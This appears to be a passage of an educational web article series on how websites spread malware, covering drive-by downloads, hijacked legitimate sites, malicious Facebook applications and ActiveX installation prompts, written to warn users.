“Drive-by” infections are possible through browser and plug-in vulnerabilities, which malware creators take advantage of. A vulnerability is a software or hardware weakness which can be a means in breaching the security of a target computer. The web technologies most often exploited, i.e. taken advantage of, in terms of malware are AcvtiveX, JavaScrypt, Java, HTML, CSS, images and the PDF format. Each of these can be a means of running an arbitrary harmful code.
There have been cases where a highjacking of a legitimate and known website led to a spread of malware on the users visiting the site:
The user clicks on the link to a legitimate URL that was hijacked by the cyber criminal for a few days or hours. Then an ActiveX control tests the vulnerability of the user’s browser. If it detects a vulnerability, the malware attacks; if not, it downloads a file, tests for another vulnerability, downloads other files, and so on. Each session of the traffic appears to be benign, but the combined activities become a coordinated attack.
Recently, because of the growing popularity of social networking, a new and very fertile ground for malware breeders has emerged. Facebook. As in the real world, the higher density of people per square meter, the higher the probability of contracting a contagious disease. Facebook is no different. Through allowing third party developers to create rich in functionality and complexity applications, Facebook became a place where malware spreads.
Facebook applications are powerful scripts which have access to user account details and do execute within the browser. Such a script can easily do a malicious act of, let’s say, send a chat with a link to follow to all of the user’s friends who appear on-line. Those who were not on-line would receive an email inviting to follow the link, sent from the user in question. The only trick to do would be to encourage a Facebook user to choose to run the offered application by some seemingly interesting action the app performs, e.g. checks who of your friends visits your profile most and would give an exact number. The numbers would be fake, the list taken from the profile and sorted randomly. The link of course would redirect whoever opened it to a malware hosting server.
The ActiveX technology is an ideal means of planting malware on the casual website visitor’s computer. ActiveX controls are small programmes, similar to Java applets, that are required to view the content of some websites in Internet Explorer. Other Microsoft products like MS Office or Windows Media Player also use this technology, which fortunately gives the upper hand to these products or browsers which don’t use it. To meet the requirement a user needs to agree to the installation, after being prompted by a pop-up window or a warning bar in the top part of Internet Explorer. It would be almost counter intuitive not to install the required component to view the web page we want, wouldn’t it?
Installing an ActiveX component is no different to double-clicking on an unfamiliar .exe file. By agreeing to download and install such a component, a user actually runs an executable which, speaking of malware, either is malware already or will start a chain reaction to download and install a number of malicious programmes from a malware hosting location. Here is an example of the use of IFRAME, which I described in the previous article, in combination with ActiveX to install malware:
The worst scenario for infections using ActiveX is when a user changes their security settings after being “annoyed” by the security warnings. By doing this he or she actually places a big “Welcome!” sign at the doorstep of their system for all ActiveX malware in the wild on the Internet, which will just install at will when being accidentally stumbled across.
Continue to Malware on Websites 3 →
2. WEB THREATS: CHALLENGES AND SOLUTIONS
4. The Anatomy of a “Drive-by-Download” by Eric L. Howes